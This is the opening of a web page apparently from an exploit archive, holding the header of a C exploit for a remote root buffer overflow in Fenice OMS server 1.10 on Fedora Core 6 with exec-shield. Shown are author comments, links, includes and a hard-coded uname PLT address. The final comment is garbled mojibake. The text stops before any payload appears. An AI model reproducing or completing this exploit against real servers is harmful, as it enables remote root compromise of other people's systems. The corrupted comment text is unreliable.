[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Fenice OMS server 1.10 Remote Buffer Overflow Exploit (exec-shield)
# Published : 2007-04-29
# Author : Xpl017Elz
# Previous Title : 3proxy 0.5.3g proxy.c logurl() Remote Buffer Overflow Exploit (win32)
# Next Title : IE NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow Exploit 2
/*
**
** Fedora Core 6 (exec-shield) based
** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit
** by Xpl017Elz
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt
**
** Reference: http://www.securityfocus.com/bid/17678
** vendor: http://streaming.polito.it/legacy_server
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** This is a very common standalone daemon remote buffer overflow vulnerability.
** I used the method that I used on my proftpd exploit again to avoid random mapping library.
** And I'm plainning to publish it in English.
**
** http://x82.inetcop.org/h0me/papers/FC_exploit/FC_oneshot_exploit.txt
**
** Kaveh Razavi's exploit uses about 750Kb and mine uses 115Kb more.
**
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define UNAME_PLT 0x8048e9c // <uname@plt> // random?????¡ã?¡± mapping?¦Ì???¡ä?? (execle()>>16)&0xff GOT 1byte???| ?????o???????¡À?¡é ?